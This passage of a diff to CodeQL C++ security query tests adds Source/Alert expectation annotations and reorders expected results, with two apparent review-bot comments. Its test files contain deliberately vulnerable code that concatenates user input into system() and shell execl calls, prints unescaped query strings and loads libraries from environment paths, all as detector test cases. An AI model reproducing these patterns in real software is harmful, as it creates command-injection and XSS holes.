test.cpp:232:11:232:16 | strncat output argument | strncat output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | edges | test.cpp:15:27:15:30 | **argv | test.cpp:16:20:16:26 | *access to array | provenance | | | test.cpp:16:20:16:26 | *access to array | test.cpp:22:45:22:52 | *userName | provenance | | 
@@ -202,28 +227,3 @@ subpaths | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | -#select -| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | -| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | -| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | -| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | -| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | -| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | -| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | -| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref index 1de765a2fdf1..4e996a47ad54 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-078/ExecTainted.ql +query: Security/CWE/CWE-078/ExecTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp index 8c7651f32756..3749d6137953 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp @@ -12,7 +12,7 @@ extern void encodeShellString(char *shellStr, int maxChars, const char* cStr); #include "../../../../../../include/string.h" ///// Test code ///// -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source char *userName = argv[2]; { @@ -20,7 +20,7 @@ int main(int argc, char** argv) { // a command. char command1[1000] = {0}; sprintf(command1, "userinfo -v \"%s\"", userName); - system(command1); + system(command1); // $ Alert } { @@ -44,11 +44,11 @@ void test2(char* arg2) { void test3(char* arg1) { // GOOD?: the user string is a `$CFLAGS` environment variable - char *envCflags = getenv("CFLAGS"); + char *envCflags = getenv("CFLAGS"); // $ Source char command[1000]; sprintf(command, "%s %s", arg1, envCflags); - system(command); + system(command); // $ Alert } typedef unsigned long size_t; 
@@ -60,10 +60,10 @@ char *strncat(char *s1, const char *s2, size_t n); void test4(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(command, filename, 1000); - system(command); + system(command); // $ Alert } void test5(FILE *f) { @@ -80,19 +80,19 @@ int execl(char *path, char *arg1, ...); void test6(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(command, filename, 1000); - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test7(FILE *f) { // GOOD [FALSE POSITIVE]: the user string is a positional argument to a shell script char path[1000] = "/home/me/", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(path, filename, 1000); - execl("/bin/sh", "sh", "-c", "script.sh", path); + execl("/bin/sh", "sh", "-c", "script.sh", path); // $ Alert } void test8(char *arg2) { 
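Review bot: In `test7` the added `// $ Alert` on the `execl("/bin/sh", "sh", "-c", "script.sh", path)` line contradicts the comment at the top of the function, which labels this case `GOOD [FALSE POSITIVE]`. The inline annotation is what the postprocess query checks, so the known false positive now reads as a wanted command-injection result. The inline expectations format has a prefix for this case: `execl("/bin/sh", "sh", "-c", "script.sh", path); // $ SPURIOUS: Alert`. With that marker, a later precision improvement to the query shows up as a fixed spurious result rather than as a lost alert.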
@@ -104,21 +104,21 @@ void test8(char *arg2) { void test9(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); + std::string path(getenv("something")); // $ Source std::string command = "mv " + path; - system(command.c_str()); + system(command.c_str()); // $ Alert } void test10(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); - system(("mv " + path).c_str()); + std::string path(getenv("something")); // $ Source + system(("mv " + path).c_str()); // $ Alert } void test11(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); - system(("mv " + path).data()); + std::string path(getenv("something")); // $ Source + system(("mv " + path).data()); // $ Alert } int atoi(char *); @@ -138,10 +138,10 @@ void test13(FILE *f) { char str[1000]; char command[1000]; - fread(str, 1, 1000, f); + fread(str, 1, 1000, f); // $ Source sprintf(command, "echo %s", str); - system(command); // BAD: the user string was printed into the command with the %s specifier + system(command); // BAD: the user string was printed into the command with the %s specifier // $ Alert } void test14(FILE *f) { @@ -172,7 +172,7 @@ void test15(FILE *f) { void test16(FILE *f, bool use_flags) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", flags[1000] = "-R", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source if (use_flags) { strncat(flags, filename, 1000); @@ -181,7 +181,7 @@ void test16(FILE *f, bool use_flags) { strncat(command, filename, 1000); } - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void concat(char *command, char *flags, char *filename) { 
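Review bot: In `test13` the expectation is appended after an existing comment, `system(command); // BAD: ... // $ Alert`, whereas every other annotated line in this file opens its comment with `$`. As far as I recall, the inline expectations parser only treats a comment as an expectation when `$` is its first non-whitespace character, and allows a trailing `//` remark after it; please confirm this line is picked up. Putting the expectation first avoids the question: `system(command); // $ Alert // BAD: the user string was printed into the command with the %s specifier`.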
@@ -192,11 +192,11 @@ void concat(char *command, char *flags, char *filename) { void test17(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", flags[1000] = "-R", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source concat(command, flags, filename); - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test18() { @@ -216,11 +216,11 @@ void test18() { void test19(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source CONCAT(command, filename) - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test20() { @@ -228,10 +228,10 @@ void test20() { char buffer[1024 * 4]; strncpy(buffer, getenv("var_a"), 1024); - strncat(buffer, getenv("var_b"), 1024); - strncat(buffer, getenv("var_c"), 1024); + strncat(buffer, getenv("var_b"), 1024); // $ Source + strncat(buffer, getenv("var_c"), 1024); // $ Source strncat(buffer, " ", 1024); - system(buffer); + system(buffer); // $ Alert } void test21() { @@ -240,13 +240,13 @@ void test21() { char buffer2[1024]; sprintf(buffer1, "%s %s", - getenv("var_a"), - getenv("var_b")); + getenv("var_a"), // $ Source + getenv("var_b")); // $ Source sprintf(buffer2, "%s %s %s", " ", buffer1, - getenv("var_c")); - system(buffer2); + getenv("var_c")); // $ Source + system(buffer2); // $ Alert } void test22() { @@ -256,9 +256,9 @@ void test22() { strncpy(buffer, "command ", 1024); for (i = 0; i < 10; i++) { - strncat(buffer, getenv("var_a"), 1024); + strncat(buffer, getenv("var_a"), 1024); // $ Source } - system(buffer); + system(buffer); // $ Alert } // open question: do we want to report certain sources even when they're the start of the string? 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected index 4f31dd3e17bf..be2a5f70bccd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected @@ -1,3 +1,7 @@ +#select +| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | edges | search.c:14:24:14:28 | *query | search.c:17:8:17:12 | *query | provenance | | | search.c:22:24:22:28 | *query | search.c:23:39:23:43 | *query | provenance | | 
@@ -22,7 +26,3 @@ nodes | search.c:73:17:73:25 | *raw_query | semmle.label | *raw_query | | search.c:77:17:77:25 | *raw_query | semmle.label | *raw_query | subpaths -#select -| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref index bd5e957761b3..1192c6d67f56 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-079/CgiXss.ql +query: Security/CWE/CWE-079/CgiXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c index 9369d80fd913..830a5919eb3c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c @@ -14,13 +14,13 @@ char* escape_html(char* raw); void bad_server1(char* query) { puts("

Query results for "); // BAD: Printing out an HTTP parameter with no escaping - puts(query); + puts(query); // $ Alert puts("\n

\n"); puts(do_search(query)); } void bad_server2(char* query) { - printf("

Query results for %s\n", query); + printf("

Query results for %s\n", query); // $ Alert // BAD: Printing out an HTTP parameter with no escaping puts("\n

"); puts(do_search(query)); @@ -59,12 +59,12 @@ void bad_server3(char* query) { puts("

Query results for "); // BAD: Printing out an HTTP parameter with no escaping - puts(query_text); + puts(query_text); // $ Alert puts("\n

\n"); } int main(int argc, char** argv) { - char* raw_query = getenv("QUERY_STRING"); + char* raw_query = getenv("QUERY_STRING"); // $ Source if (strcmp("good1", argv[0]) == 0) { good_server1(raw_query); } else if (strcmp("bad1", argv[0]) == 0) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index f328113106e4..999c7f5240df 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | edges | test.cpp:37:73:37:76 | *data | test.cpp:43:32:43:35 | *data | provenance | | | test.cpp:64:30:64:35 | *call to getenv | test.cpp:64:30:64:35 | *call to getenv | provenance | | @@ -10,5 +12,3 @@ nodes | test.cpp:64:30:64:35 | *call to getenv | semmle.label | *call to getenv | | test.cpp:73:24:73:27 | *data | semmle.label | *data | subpaths -#select -| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref index a9ca1db51997..57318b8ffeb2 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-114/UncontrolledProcessOperation.ql +query: Security/CWE/CWE-114/UncontrolledProcessOperation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp index 299e0372d4ae..bae7e5fdf995 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp @@ -40,7 +40,7 @@ void CWE114_Process_Control__w32_char_environment_82_bad::action(char * data) HMODULE hModule; /* POTENTIAL FLAW: If the path to the library is not specified, an attacker may be able to * replace his own file with the intended library */ - hModule = LoadLibraryA(data); + hModule = LoadLibraryA(data); // $ Alert if (hModule != NULL) { FreeLibrary(hModule); @@ -61,7 +61,7 @@ void bad() { /* Append input from an environment variable to data */ size_t dataLen = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index ca24075c2c34..c7cc621e4b3a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected 
@@ -1,3 +1,14 @@ +#select +| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | +| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | +| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. 
| test.cpp:76:12:76:17 | fgets output argument | string read by fgets | +| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | +| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | +| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | edges | test.cpp:24:30:24:36 | *command | test.cpp:26:10:26:16 | *command | provenance | | | test.cpp:29:30:29:36 | *command | test.cpp:31:10:31:16 | *command | provenance | | 
@@ -40,14 +51,3 @@ nodes | test.cpp:113:8:113:12 | *call to fgets | semmle.label | *call to fgets | | test.cpp:114:9:114:11 | *ptr | semmle.label | *ptr | subpaths -#select -| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | -| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | -| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. 
| test.cpp:76:12:76:17 | fgets output argument | string read by fgets | -| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | -| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | -| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref index a9ca1db51997..57318b8ffeb2 100644 --- 